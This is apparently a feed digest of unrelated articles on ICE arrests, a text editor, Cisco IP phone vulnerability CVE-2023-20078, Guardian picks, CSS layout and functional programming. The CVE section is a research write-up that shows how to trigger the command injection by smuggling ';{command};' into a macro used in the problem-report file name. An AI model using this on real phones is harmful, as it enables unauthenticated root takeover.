Trump has made anti-immigrant language a centerpiece of his platform since he announced his first run for the White House in 2015. His comments against the Somali community of Minnesota may have been the most specific broadside against a single ethnic group, said Chan.

“I can’t think of a time in recent U.S. history that a sitting U.S. president has called the people from an entire country ‘garbage,’” Chan said. “Even where there is a historical precedent, it’s one that we thought we were beyond.”

Twelve Arrests?

It’s unclear how many arrests have been made so far. ICE and its parent agency, the Department of Homeland Security, have refused to give specifics.

In one press release on Thursday, however, Homeland Security officials said that at least 12 people had been arrested so far. As with other recent immigration sweeps across the country, Homeland Security labeled the detainees as the “ worst of the worst ,” saying the arrestees included people with convictions for sexual assault of a minor.

Many, however, had minor criminal infractions, including driving while intoxicated. And others still had checkered pasts that they had long since made amends for.

Among the detainees picked up this week by ICE was Abdulkadir Sharif Abdi, whom the agency described in a press release as a gang member.

Abdi’s wife, Rhoda Christenson, told The Intercept that she was driving to pick up a prescription for her mother on Monday when she received a call from a neighbor telling her that Abdi had been arrested by ICE.

Christenson acknowledged her husband’s criminal past — which led to a deportation order during the first Trump administration — and his struggles with addiction, but said he’s been sober for more than 15 years. He now works at a homeless shelter and has become a staple of the local recovery community.

“He’s such a light in the community,” Christenson said in an interview Friday morning. “He has so much to offer and shows so much love and respect for the homeless population he works with.”

Christenson was sent reeling again Thursday when she saw the allegations from Homeland Security that her husband was an active gang member, something she categorically denied.

“How can they just lie like that?” she asked. “I know social media is crazy, but a government website is something we have to be able to rely on for accurate information. It’s really disheartening and it makes me worried for how they will treat him.”

Flow Control: a programmer's text editor

Lobsters
flow-control.dev
2025-12-06 09:42:13
Comments...
Original Article

a programmer’s text editor

Flow Control is under active development, but very stable.

🚀 Features

  • Lightning Fast TUI with ≤6ms frame times, low latency input handling and smooth animated scrolling
  • Intuitive UI with tabs , scrollbars and palettes with full mouse support for all UI elements
  • Support for more than 70 programming languages , zero configuration needed, via tree-sitter powered syntax highlighting
  • Language Server Protocol pre configured support for most language servers
  • Powerful multi-cursor editing and integrated clipboard history
  • Powerful configurable keybinding system that supports modal and non-modal editing styles
  • Multiple pre-configured keybinding modes
    • Flow Control - GUI IDE style bindings (similar to vscode)
    • Emacs
    • Vim
    • Helix
    • User created
  • Hybrid rope/piece-table buffer system, edit very large files with thousands of cursors
  • Infinite undo (at least until you run out of ram)
  • Full unicode support, including support for the kitty text sizing protocol
  • Plenty of themes included and support for vscode themes via the flow-themes project
  • Runs on Linux, FreeBSD, MacOS, Windows and Android (under termux) with easy cross-compilation to all supported targets

Requirements

  • A modern terminal with 24bit color and, ideally, kitty keyboard protocol support. Kitty , Foot and Ghostty are the recommended terminals at this time. Zellij also works well. Most other terminals will work, but likely with reduced functionality.
  • NerdFont support. Either via terminal font fallback or a patched font.
  • A UTF-8 locale

🛣️ Roadmap

See our devlog for on-going updates from the development team.

In Development

  • LSP completion support
  • Persistent undo/redo
  • File watcher integration

Future

  • Collaborative editing
  • Plugin system
  • Multi-terminal sessions

CVE-2023-20078 technical analysis: Identifying and triggering a command injection vulnerability in Cisco IP phones

Lobsters
www.ibm.com
2025-12-06 06:10:26
Comments...
Original Article

CVE-2023-20078 catalogs an unauthenticated command injection vulnerability in the web-based management interface of Cisco 6800, 7800, and 8800 Series IP Phones with Multiplatform Firmware installed; however, limited technical analysis is publicly available. This article presents my findings while researching this vulnerability. In the end, the reader should be equipped with the information necessary to understand and trigger this vulnerability.

Vulnerability details

The following Cisco Security Advisory ( Cisco IP Phone 6800, 7800, and 8800 Series Web UI Vulnerabilities – Cisco ) details CVE-2023-20078 and CVE-2023-20079. This vulnerability affects Cisco 6800, 7800 and 8800 Series IP Phones with Multiplatform Firmware Release earlier than 11.3.7SR1. The details section for CVE-2023-20078 describes the vulnerability as: “A vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800 and 8800 Series Multiplatform Phones could allow an unauthenticated, remote attacker to inject arbitrary commands that are executed with root privileges.” Like many vulnerability disclosures, information concerning triggering the vulnerability is limited to: “This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device.” Cisco assigned the Bug Number: CSCwc78400 for this vulnerability. CVE-2023-20078 is assigned a CVSS Base Score of 9.8.

Industry newsletter

The latest tech news, backed by expert insights

Stay up to date on the most important—and intriguing—industry trends on AI, automation, data and beyond with the Think newsletter. See the IBM Privacy Statement .

Thank you! You are subscribed.

Official fix

The previously mentioned Cisco Security Advisory explicitly states Cisco has released software updates that address CVE-2023-20078 and CVE-2023-20079 and that there are no workarounds available. Cisco specifically addresses these vulnerabilities in a follow-on firmware: Firmware Version 11.3(7)SR1.

Testing hardware

Testing was conducted on a Cisco IP Phone 6841 with Multiplatform Firmware version 11.3.7 installed. I managed to secure an unboxed phone from eBay on the cheap. You may find a datasheet on this device here: ( Cisco IP Phone 6800 Series with Multiplatform Phone Firmware Data Sheet – Cisco ).

What is multiplatform firmware?

An important detail regarding this vulnerability is it’s limited to Cisco 6800, 7800 and 8800 Series IP Phones which are running a vulnerable release of Cisco Multiplatform Firmware. Knowing little about IP Phones and the Cisco product line, this detail raises the question, “What is Multiplatform Firmware?”. Cisco describes Multiplatform Firmware (MPP) stating “The MPP line is designed for Webex Calling and compatible with third-party platforms, allowing you to deploy it your way.” ( Cisco IP Phones with Multiplatform Firmware (MPP) – Cisco ). Based upon this description, it appears MPP provides hardware support for an alternative to the IP call agent you may be familiar with: Cisco Unified Communications Manager (CUCM).

Release notes analysis

The following link ( Cisco IP Phone 6800 Series Multiplatform Phones Release Notes for Firmware Release 11.3(7)SR1 – Cisco ) includes release notes for the patched firmware. Detailed in this Release Note document includes a resolved bugs table, which mentions the bug number for CVE-2023-20078, CSCwc78400. Its description provides useful information in narrowing our focus on identifying where the vulnerability may lie in the firmware: “Command injection during PRT file generation ”. The Release Notes also provide additional, detailed information outlined in the “Changes in this release” section. The “PRT (Problem Report Tool) file name restrictions” section seems to support our thought that the command injection vulnerability lies somewhere in this PRT file generation function. The sentence describing the restrictions includes a juicy detail that we’ll come back to later in this article: “This firmware does not allow the use of “.” character in PRT name either used directly or included as a part of the macro variable”. All of this information should increase our confidence even more about where this vulnerability lies: Somewhere in a function related to PRT file generation.

What is a PRT file?

The following document ( Report Phone Issues on the Cisco IP Phone 8800 Series Multiplatform Phone – Cisco ) describes what a Problem Reporting Tool (PRT) file is, and provides excellent documentation on how to generate and collect one. “The Problem Reporting Tool (PRT) on the Cisco 8800 Series IP Phone allows you to collect and send phone logs to your administrator. These logs are necessary for troubleshooting in case you run into phone issues”. This document will prove extremely useful in understanding how to trigger “PRT file generation”, as well as possible input sinks for the command injection vulnerability.Let’s remember these for later.

Figure 1 – Three Possible Input Sinks for the Command Injection Vulnerability

Figure 2 – An Example of a PRT File Ready for Download

Firmware analysis – Obtaining the vulnerable web management binary

The latest vulnerable firmware is available for download at Software Download – Cisco Systems . Utilizing the open source project binwalk ( GitHub – ReFirmLabs/binwalk: Firmware Analysis Tool ), I successfully extracted the root filesystem, encapsulated in the rootfs2.68xx.11-3-7MPP0001-272.sbn binary file.

Figure 3 – 68XX Root File System

With enough GREP-fu, it is possible to identify the binary which ultimately serves the Web Management User Interface containing the vulnerability: /usr/mbin/spr_voip. However, I later discovered that the easiest way to find this binary was to look at a PRT file. After generating a valid PRT file, investigating the “show-output-{DATE}-{TIME}.log” (An example file would be “show-output-20240115-142558.log”), you can see what appears to be a netstat output (Figure 4) which shows the spr_voip binary listening on TCP port 80. Bingo! Let’s analyze this binary.

Figure 4 – spr_voip Binary Listening on Port 80

Binary analysis – Investigating spr_voip

Generating our own legitimate PRT file we can also identify which web route handles PRT file generation. By intercepting the request with a proxy, we’re able to identify that “/genprt” is responsible for handling PRT file generation requests. We also get a better understanding of the expected request and response body messages:

Request:

POST /genprt HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.86.33/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 192.168.86.33
Content-Length: 362
Pragma: no-cache
Connection: close

2012-01-15&13:55:29&Other

Scroll to view full table

Response:

HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 21:02:21 GMT
Last-Modified: Mon, 15 Jan 2024 21:02:21 GMT
Etag: 65a59d5d.6b
Content-Type: application/json
Content-Length: 107
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors none
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Accept-Ranges: bytes

{
    “url”:      “”,
    “status”:                “0”,
    “uploadStatus”:                 “3”,
    “prtfile”:                 “prt-20240115-150203-0CD0F8F52A36.tar.gz”
}

Scroll to view full table

With our “/genprt” knowledge in hand, let’s import and begin analyzing spr_voip in Ghidra and find where the Command Injection vulnerability lies. Using the String Search feature in CodeBrowser, we can search for the string “genprt” and view results.

Figure 5 – /genprt String in spr_voip Binary

At location 003e2168 we see the object DAT_003e2168. If we view references to DAT_003e2168, we see only one reference at 001c4368:

Figure 6 – References to /genprt String in spr_voip

001c4368 is part of a larger function, serving as spr_voip’s request handler (Identified as UndefinedFunction_001cf338 in Figure 7). Looking at the decompiled code, we see the function “handl_prt_gen” is called if the request is destined for “/genprt”.

Figure 7 – spr_voip Request Handler

Observing the decompiled output for handl_prt_gen, we can see the gen_prt_file function being called:

Figure 8 – handl_prt_gen Function

The gen_prt_file function is where the excitement is at. Starting at line 91, we see a PRT file name string being created and passed to larger strings, which appear to create a command (line 99 or line 102). This string is then passed to exec_prt_cmd (lines 100 or 103). We’ve identified two possible input sinks! (/usr/bin/genprt_infra and /usr/bin/genprt.sh) The command injection alarms are sounding! After analyzing both, genprt.sh is where we should focus our attention.

Figure 9 – Possible Input Sink for Command Injection

Our input sink – genprt.sh

Viewing genprt.sh, the comment at the top of the file, “Script used to generate prt file”, tells us we are getting closer.

Figure 10 – genprt.sh Script

We also see where our input sink is used in the script, captured as $filename:

if [ -z $1 ] ; then
    ext=$(date
    filename= “prt-$ext.tar.gz”
else
    filename= $1
logit “prt filename $filename” 

Scroll to view full table

At the bottom of the script, we see where our input sink, $filename, is used, to compress a directory containing all of the files necessary for the PRT tar.gz file. There is our Command Injection!

Figure 11 – genprt Command Injection Vulnerability

If we recall the response body for a legitimate PRT file generation request, the PRT file had a filename like: “prtfile”: “prt-20240115-150203-0CD0F8F52A36.tar.gz”, where 0CD0F8F52A36 is the MAC Address of the device. We can see this filename matches the naming convention found in the true condition of the if statement: filename= “prt-$ext.tar.gz”. The question is how can we ensure our input sink is passed to the $filename variable (filename= $1)?

Release notes: Remember “macro variable”?

After tedious levels of static analysis on spr_voip, I reviewed the Release Notes once more. The statement: “This firmware does not allow the use of “.” character in PRT name either used directly or included as a part of the macro variable.” caught my eye once more.

What is a macro variable?

Buried deep within the following document ( Cisco IP Phone 8800 Series Multiplatform Phone Administration Guide for Release 11.3(1) and Later – Phone Features and Setup [Cisco IP Phone 8800 Series with Multiplatform Firmware] – Cisco ), Macro Variables are described: “You can use macro variables in XML URLs. The following macro variables are supported:…”. The Macro Variables GPP_A through GPP_P caught my attention. The document describes these macros as “general-purpose parameters”.

Investigating the Web Interface for the device, I discovered that the GPP Macros may be set under /admin/advanced -> Voice -> Provisioning Tabs. By default, the admin routes are not password protected.

Secondarily, I observed the PRT Name: field. After reading the documentation further and testing, I discovered I can apply a GPP Macro by using the ${GP Parameter} in the field. By setting the GPP A: parameter as “;{command};” and then setting the PRT Name: to “prt-$A”, and then generating a new PRT file, I can successfully achieve command injection!

Figure 12 – Setting GPP Macros for Command Injection

Figure 13 – Triggering PRT File Generation Once More

Figure 14 – Confirming Command Injection

Conclusion

At first glance, CVE-2023-20078 provides little useful information necessary for exploitation. However, by combining Cisco Security Advisories, Release Notes and Product Documentation with firmware analysis, it is possible to derive how to trigger the vulnerability. With this knowledge in hand, there are multiple avenues for acquiring a shell on the device; however, I will leave this as a challenge to the reader.

Six greats reads: a train ride to the future; searching for the ‘sky boys’ and wallaby hunting in the English countryside

Guardian
www.theguardian.com
2025-12-06 06:00:46
Need something brilliant to read this weekend? Here are six of our favourite pieces from the last seven days Continue reading......
Original Article

  1. 1. ‘It’s going much too fast’: the inside story of the race to create the ultimate AI

    computer with lots of wires
    Composite: Getty/Guardian Design Team

    In Silicon Valley, rival companies are spending trillions of dollars to reach a goal that could change humanity – or potentially destroy it. Robert Booth caught a morning train through the San Francisco outskirts to speak to those working at the cutting edge of this multi-trillion-dollar revolution, where some people worry that the push for AI is “all gas, no breaks”.

    Read more


  2. 2. ‘It was extremely pornographic’: Cara Hunter on the deepfake video that nearly ended her political career

    Cara Hunter.
    Cara Hunter. Photograph: Polly Garnett/The Guardian

    The Irish politician was targeted in 2022, in the final weeks of her run for office. She has never found out who made the malicious deepfake, but knew immediately she had to try to stop this happening to other women. Anna Moore spoke to her for the first part of this powerful new series about the rise of deepfakes and their impact on the women affected by them.

    Read more


  3. 3. ‘It would take 11 seconds to hit the ground’: the roughneck daredevils who built the Empire State Building

    A construction worker connects two cables suspended high above the New York during the construction of the Empire State Building.
    A construction worker connects two cables suspended high above New York during the construction of the Empire State Building. Photograph: Lewis W Hine

    They are some of the most famous images of the world’s most famous building. But who were the men in them? Catherine Slessor spoke to the author Glenn Kurtz , who has made it his mission to identify men like “The Sky Boy” who built the Empire State Building, and were captured in the photographs of Lewis W Hine.

    Unlikely to be as historically beloved as the Empire State is JP Morgan’s new midtown neighbour, the new HQ of JP Morgan on Park Avenue, which boasts unusually tall floors and interior wind machine to flutter the stars-and-stripes flag in the lobby. Our architecture critic Oliver Wainwright reports on this “eco obscenity” .

    Read more


  4. 4. ‘It moved … it was hopping!’ One man’s search for a wild wallaby in the UK

    Sam Wollaston prepares to go wallaby hunting in Oxhill, Warwickshire.
    Sam Wollaston prepares to go wallaby hunting in Oxhill, Warwickshire. Photograph: Fabio De Paola/The Guardian

    Reports of escaped wallabies are on the rise in Britain, especially in southern England. But how easy is it to spot these strange and charismatic marsupials – and why would a quintessentially Australian creature settle here? Sam Wollaston donned his binoculars to see if he could spot one. And guess what …

    Read more


  5. 5. ‘I wish I could say I kept my cool’: my maddening experience with the NHS wheelchair service

    Paul Sagar at his home in London.
    Paul Sagar at his home in London. Photograph: Antonio Zazueta Olmos/The Guardian

    Last year, Paul Sagar wrote a harrowing account of becoming paralysed in a climbing accident . For the Long Read this week he chronicled his struggles with England’s wheelchair services: “I did not yet know that local wheelchair services are a lottery, in which some of the most vulnerable people in society roll the dice. A lottery in which the taxpayer acts as permanent lender of last resort – while private companies profit.”

    Read more


  6. 6. ‘The Mamdani effect’: wealthy New Yorkers show renewed interest in Miami’s Billionaire’s Beach

    Motorists cruise along Collins Avenue
    Motorists cruise along Collins Avenue Photograph: Scott McIntyre/The Guardian

    A stretch of prime waterfront real estate in Miami, home to a mix of famous old art deco hotels such as the Delano and Raleigh, is where realtors and developers are beginning to see the first shoots of what they call the “Mamdani effect”: the predicted exodus of wealthy New Yorkers in the wake of democratic socialist Zohran Mamdani’s election as mayor. Richard Luscombe spoke to the real estate executives who are primed to cash in.

    Read more

Should CSS be Constraints?

Lobsters
pavpanchekha.com
2025-12-06 04:17:31
Comments...
Original Article

CSS is hard. The layout rules are quite complex and hard to pick up just from examples. Something like "centering a <div> " is, like, famously a problem. Or remember the 2000s when you'd read A List Apart for all sorts of crazy ways to achieve the "Holy Grail" layout, specifically a header, a main body and sidebar of equal heights, and a footer? Given that it's such a mess, should we maybe just throw it out and start over with a totally different system?

I do feel like I can speak on this some authority. In grad school I wrote the first formal specification of the CSS 2.2 spec; the formal spec passed (the relevant fragment of) the conformance test. So I know the existing algorithm in quite a lot of detail, though of course I'm going beyond that expertise when I talk about what designers do or about other systems.

Constraints

One commonly-proposed replacement for CSS is a constraint system. In a constraint system you can just directly say:

(obj.top + obj.bottom) / 2 ==  (obj.parent.top + obj.parent.bottom) / 2

This line constrains the vertical midpoint of obj to be the vertical midpoint of its parent; in other words, it constrains it to be vertically centered.

And in fact this idea has been explored quite a bit. In CSS, there's the well-known Constraint cascading style sheets paper. The idea in that paper is that the web page author writes constraints , somewhat like the one above, and then the browser runs a constraint solver which computes positions and sizes for each object that satisfy the constraints. This is much like normal CSS, where the web page author writes rules and then the browser runs a layout algorithm that computes sizes and positions. 1 1 Naturally in both cases you actually compute a lot more than just sizes and positions: fonts, colors, and so on. But layout is taken to be the "hard part" of the problem, and I don't really disagree with that.

In fact the authors (especially Alan Borning ) have a long history with constraint solvers, and in particular are associated with the Cassowary incremental constraint solver, where "incremental" means it can not only solve the constraints quickly but also re-solve them extra-quickly if the page changes a small amount, like in response to JavaScript or user action. Real browsers do that too . And they've been quite successful. Most notably, iOS provides constraint-based using a re-implementation of Cassowary, and I hear it's quite popular.

What's wrong with constraints

All that said, I don't think a constraint system would actually be better for the web. With rule-based systems like current CSS, the challenge is that the rules are really complex and it's hard to predict what the layout will be because actually executing the rules in your head is nearly impossible. But with constraint-based systems, the layout might be literally under - or over -determined, in the sense that there might be more than one, or less than one, layouts that satisfy your rules.

In fact, writing layout constraints for UIs that aren't either under- or over-determined is basically impossible and I'm not sure anyone has ever done it. Even the simple "vertical centering" constraint above doesn't fix the size or position of either box. It doesn't say that the outer box ( obj.parent ) should be the minimum possible size to contain its child ( obj ), or that they should both be onscreen, or whatever. Maybe you'd write other constraints to achieve that, but the more constraints you write, the greater the chance those constraints will conflict, leaving you over-determined.

There's a bunch of things you could do at this point. For under-determined layouts, you could add "implicit rules", like saying that boxes should always be onscreen. Or "optimization criteria", like saying that if multiple layouts are available you should pick the one that takes up the least space. And for over-determined layouts, you could do the reverse, like assigning "weights" to each constraint and then optimizing for breaking the fewest. This isn't a crazy way to build a system—it's basically how LaTeX works—but fiddling with the weights, the exact form of implicit rules, the optimization criteria becomes, in practice, the actual determiner of how layouts look. And it turns out that simple implicit rules / criteria / weights lead to bizarre, horrible edge cases, so if you want things to look good you'll need really complicated ones, and then you're back to the actual layout being hard to predict from the style sheet.

In fact, LaTeX is not widely beloved for its predictable layout. And while constraint layout is , I believe, popular on iOS, it's notable that iOS quite famously allows only a small number of screen / window shapes. And also people still complain about the constraint-based layout being fussy, brittle, and unpredictable, with debugging (especially debugging under- and over-constrained layouts) considered tedious and annoying. Plus, people say it's verbose; given that there actually are conventions and patterns to how people design UIs, it would be nice to actually express those patterns and be modular with regard to them, and constraint-based systems, especially once you start adding implicit rules or optimization criteria, are quite explicitly not modular.

I do applaud Apple for shipping and I'm happy people are using it and it solves their problems. LaTeX solves mine! 2 2 Newer students seem really excited about Typst , which I have not tried but. But I do think designers in constraint-based systems suffer exactly the kinds of problems theory would predict.

What's the underlying problem?

So why is this so hard? Why do we get all these weird edge cases pop up whenever we do layout? I think the issue is that layout actually is quite hard.

Here, let me give you an example. Here's a line from my formal semantics of CSS 2.2, the specification of text-align: center :

[(is-text-align/center textalign)
 (= (- (left-outer f) (left-content b)) (- (right-content b) (right-outer l)))]

This is saying that if a container b has text-align: center specified, then its left gap (the x position of left outer edge of its first child f , minus the left content edge of the container b ) equals its right gap (similar, using right edges, the last child l , and the subtraction being reversed). It's a constraint! But then if you go a few lines up you'll see that before actually applying this constraint, we first check if the container is even big enough to contain the content, and if not, we left align it no matter what.

What? Really? Yep. It's a tricky little quirk of the CSS semantics, section 9.4.2 of CSS 2.1. 3 3 Actually, I think the controlling standard on this exact quirk is now CSS Text Level 3 which has a quite clear paragraph documenting this behavior. If text is centered inside a box too small to contain it, we don't want it spilling out the left edge (it might go off-screen, where the user cannot scroll); left-aligning ensures it only spills out on the right.

That's a funky quirk but also, you may have never noticed it and if you did this edge case probably was better than what the layout would have been. Meaning, actually, building this edge case into the definition of text-align was a smart choice by the CSS designers, embedding hard-earned design wisdom into intuitive rules that people mostly use without issue. ( text-align is not considered one of the bad scary parts of CSS.) And on the contrary, in a "clean" constraint-based system, web page designers would probably not bothered to manually add this as a constraint, and probably in quite a few cases that would result in worse, not better layout.

Generalizing a bit, the challenge is that we're never just "deciding what our page looks like". We are always designing a layout that is responsive to parameters like screen size, zoom level, details of font rendering (Windows and macOS render identical fonts slightly differently), operating system details, and even higher-level changes in our application like new content, new features, translations to other languages, 4 4 German words are very long, Chinese ones are very short. device oddities like notches, and so on.

Designing a layout from scratch that looks good in any possible one of those contexts is basically impossible—it's hard enough to do both desktop and mobile!—and so designers are, by necessity, going to rely on implicit knowledge encoded somewhere on what to do in edge cases. There's going to be a huge amount of this implicit knowledge, and whether it's encoded in rules or weights or optimization criteria it's going to be opaque to designers and surprising at least sometimes.

For example, in CSS you can also justify text, stretching spaces between words so that all lines in a paragraph (except the last!) have the same right edge. But, famously, if the line width is too narrow and the line contains too few words that are too long, then the spaces between them get stretched comically far apart and it looks terrible. You can do better by enabling hyphenation (which might turn 2 really long words in a line into 3 or more moderate size word chunks) or letter-spacing (which might also stretch the spaces between letters slightly) but those are themselves unpredictable and language-dependent and still sometimes look ugly.

So where did all these implicit rules about justification come from? Well, text justification comes from a long Western tradition . 5 5 That post claims Trajan's column, built 113 AD, as an early example. So what happened in that long Western tradition, before CSS and computers, when this problem came up? Well, in the olden days, if you were a newspaper columnist and your column was ugly when justified 6 6 Most newspapers justified their text and also ran it in lots of narrow columns, so it was especially a problem with newspapers. then your editor might just rephrase your text into smaller words. That technology might be slowly becoming possible but is clearly outside the bounds of what CSS would do. Generalizing, these implicit rules often draw from traditions where these edge cases simply never came up! So it's no surprise that there might be no ideal workable of implicit rules with no edge cases.

So what can we do instead?

I think what we can do, though, rather than trying a ground-up re-conception of the problem, is to improve the situation by providing more-intuitive rule systems with more-predictable less-esoteric rules. For example, when designing CSS layouts, you can use negative margins and floats and clear: both like we did in the A List Apart days. Or you can use flex-box and grid . Both are workable but you can guess which of these I teach to students!

To analogize a bit… JavaScript has all sorts of bizarre mis-behaviors and semantic oddities like for ... in loops or the with statement or totally insane semantics and syntax 7 7 Look for "Direct and indirect eval"; eval(<expr>) is a special syntactic form separate from function application but there's also a function named eval that can be applied with normal function application, and they behave differently. One solution to this problem is to forsake JavaScript forever, to use Lisp or Haskell or Rust or something. But another is, like, Typescript and ESLint, which together make it really easy to avoid all the bad features of JavaScript and use good versions instead. C has a similar situation, where strcpy has really simple but also bad semantics. One option is forsaking C and rewriting in Rust. Another is using strlcpy .

In CSS specifically, a lot of the problems in CSS layout are problems more precisely in "Flow layout", the default layout mode which is optimized around layout out text in a standard Western style. What's fine for text isn't good for applications, and doing UI design using text formatting tools like floats and clear was never going to be simple and intuitive. By contrast, newer layout modes like Flex-box and Grid are maybe a bit more complex off the bat, but once you grasp the mental model are quite intuitive with far fewer sharp edges.

So I think in fact the solution is what the CSS committee has been doing, standardizing new and more intuitive layout modes optimized for the specific types of layouts being poorly served by what currently exists. With just a bit of effort, those new layout modes can be intuitive, with few edge cases, while still building in a lot of implicit knowledge around, for example, how to respond to container size changes or handle content that is too big or too small.

Thanks to my PhD student Andrew Riachi , whose work on his own website inspired this blog post.

What's the Point of Learning Functional Programming?

Lobsters
blog.daniel-beskin.com
2025-12-06 03:56:35
Comments...
Original Article

"What's the point of learning functional programming?" was a genuine question I got from a student on a functional programming course I was TAing on.

But let's rewind for a bit of background first. As I found myself standing in front of a frightened looking class, reviewing some Haskell basics, I was starting to feel guilty 1 for overwhelming them with all these foreign new concepts. Recursion, currying, function composition, algebraic data types, and the list goes on and on. So it felt natural to give them an escape hatch.

I mean, if all you know in life are loops, how can you possibly make do with just recursion? So when it was time for a new homework assignment we gave them a hint along the following lines:

Try solving with Pythonish pseudocode first, and every time you have a loop, you can convert it to a tail recursive function as follows...

Proceeding to explain how to convert loops to tail recursion 2 . At that, some of the students seemed mildly relieved, and continued with their homework.

Fast forward after the submissions. A student approached me after class with a question. I was surprised, till now I scarcely seen them outside their Haskell stupor. And here's what the student had to say. "If all we did was write some Python in Haskell syntax, what's the point of learning functional programming?".

Thinking about it, he was right. With the escape hatch we gave them they really could solve the homework by mechanically translating Python code into Haskell. Apart from some new syntax, you're not really learning much of anything new. And that's unfortunate, there's so much to learn from Haskell and functional programming in general. It would be a shame to miss the opportunity.

Can we do better?

The Homework

The homework problem was to solve the knight's tour problem . That is, given a chess board of some arbitrary dimensions and a starting position, find a path that a knight can take that will go through all the cells of the board exactly once.

Efficiency was not the point of this exercise, so the students could just do a brute-force search for the correct path using backtracking. Suppose you're a student and Python is your main weapon of choice. How would you solve this?

Here's the core function of a very naive attempt at brute-forcing the solution 3 :

# 1

def tour(n, visited, moves, pos):

if len(visited) == n * n: # 2

return moves

for knight_move in all_moves: # 3

(row, col) = pos

(dx, dy) = knight_move.value # 4

next_row = row + dx

next_col = col + dy

next_pos = (next_row, next_col)

# 5

if is_valid(n, visited, next_row, next_col):

new_visited = visited + [next_pos] # 6

new_moves = moves + [knight_move]

# 7

result = tour(n, new_visited, new_moves, next_pos)

# 8

if result is not None:

return result

# 9

return None

This is not very good code, for various reasons. But that's not really the point, it (slowly) solves the problem as stated, and that's good enough for illustration purposes. Let's review what this does:

  • tour is a recursive function (1) that takes the current state as input:
    • The size of the board n
    • The list of already visited coordinates
    • The moves we constructed so far
    • And a tuple of coordinates pos for the current position
  • We have a stopping condition (2), if the path we visited covered the whole board, in which case we are done and we return the moves that were constructed
  • If not, we iterate over all possible knight moves (3), which are defined as a separate enum
  • For each such move, we construct the next cell that we are going to visit (4)
  • If the new cell is valid (5), i.e., within the bounds of the board and wasn't visited before
  • We add the new position to the list of visited cells (6), and the current move to the moves we are building 4
  • We then proceed with the next step by recursively calling on tour with the new state (7)
  • If the result of the recursive call was successful we return that (8)
  • Otherwise, we backtrack on this attempt and try the next knight move in the list
  • When we exhausted all the possible knight moves, we give up and return None (9)

This is all good and well, but the actual homework is in Haskell. What good is it to have this Python solution instead?

A Haskell Rewrite

It is true that having a concrete (and correct ) solution written out is very helpful in thinking about a problem. But with the tip that we gave the students about loops and recursion, it's even better than that. It's actually fairly mechanical to translate the Python code into Haskell. To wit 5 :

tour n visited moves row col =

if length visited == n * n

then Just moves -- 1

else go allMoves -- 2

where

-- 3

go [] = Nothing

go (knightMove : rest) =

let (dx, dy) = moveValue knightMove

nextRow = row + dx

nextCol = col + dy

nextPos = (nextRow, nextCol)

in if isValid n visited nextRow nextCol

then

let newVisited = visited ++ [nextPos]

newMoves = moves ++ [knightMove]

result = tour n newVisited newMoves nextRow nextCol

-- 4

in case result of

Just solution -> Just solution

Nothing -> go rest -- 5

else go rest -- 6

If you're familiar with Haskell syntax, this code should look basically the same as the original Python code. There are a few differences, but they are mostly cosmetic:

  • Since there's no None (or null s in general) in Haskell, we have to wrap things with Maybe (1), it's a bit more syntax compared to Python, but not by much
  • Haskell is expression-oriented, so there are no early returns
  • As a consequence the stopping condition has an else (2) that invokes the logic for the next step
  • The main loop over knight moves was replaced by a tail recursive function called go (3), this is our tip in action
  • We need a bit more ceremony when working with Maybe , so we pattern match on it (4)
  • Since we are not running in a loop, we must call the next backtracking step explicitly by invoking go (5, 6) with a new argument

If you're a student who just created this Haskell solution from the Python sketch, what new things did you learn?

You might've learned that it's possible to work without nulls. But since this code is small, the consequences of not having null are not very visible, and you mostly get just some added syntactic noise 6 . And not having null is not a uniquely functional thing, e.g., Rust doesn't use null as well.

There's a glimpse of being more expression-oriented here. That's a deep and very impactful principle. But since we just mechanically translated from Python, it's easy to miss its significance. This is even more obscured by the fact that it's difficult to appreciate the consequences of expression-orientedness "in the small".

Lastly, we learned that it's possible to replace iteration with simple recursion. Which is cool and all, but what's the point? for loops work well enough, doing recursion just for that feels like a lousy (and overly general) syntax for something we already have figured out.

If you submit this solution to the problem it won't be out of place to wonder "what's the point?".

Going Functional

Now you may be screaming at the screen that no, functional programming is worth learning, it's not just Python with uglier syntax. And you would be right, there is a lot to learn, even with a simple assignment such as the one we are working with now.

But to get these benefits we must make an effort to break away from our "mainstream" roots, and stop translating the old way into a new syntax. We need to completely change the way we think about the problem and its solution.

For problems like this knight's tour, one good approach is to use what is called "wholemeal programming" :

Functional languages excel at wholemeal programming, a term coined by Geraint Jones. Wholemeal programming means to think big: work with an entire list, rather than a sequence of elements; develop a solution space, rather than an individual solution; imagine a graph, rather than a single path. The wholemeal approach often offers new insights or provides new perspectives on a given problem. It is nicely complemented by the idea of projective programming: first solve a more general problem, then extract the interesting bits and pieces by transforming the general program into more specialised ones.

So instead of exploring the solution space step by step, we'll create a list of the whole solution space at once, and then use that list to solve the problem we are interested in. Then I'm sure we'll find something new to learn about programming and problem-solving.

The first issue to tackle is, how can we possibly represent the whole solution space? It might be huge. Lucky for us, Haskell is lazy by default, so we can just pretend that we have the full list, but actually compute it fully only on demand.

Next, since we are going to deal with a state space, what are the actual states that we will be working with?

We can encode a single state in the tour with this record 7 :

data TourState = TourState

{ board :: Board

, visited :: [KnightPos]

, moves :: [KnightMove]

, current :: KnightPos

}

These are basically the arguments to the original tour function wrapped up in a single record (with some more civilized wrapper types) 8 .

To be able to explore the state space, we need a way to move between states. For that we can define:

moveState :: TourState -> KnightMove -> Maybe TourState

Given a single state and a move, we compute the next state by calculating the new position and updating the list of moves. Since not every move is legal from a given state, we accommodate possible failure with a Maybe . If we can't move to the next state the result will be Nothing .

You can see the implementation in the repo , but it's basically the same logic that we had before, just adapted to using TourState .

With moveState we can apply one move to a state. Next we want to try out all the possible knight moves from a state. The signature will be:

nextStates :: TourState -> [TourState]

From a given TourState generate all possible (legal) states that can be reached by a single step. Here's the implementation:

nextStates state = mapMaybe (moveState state) allKnightMoves

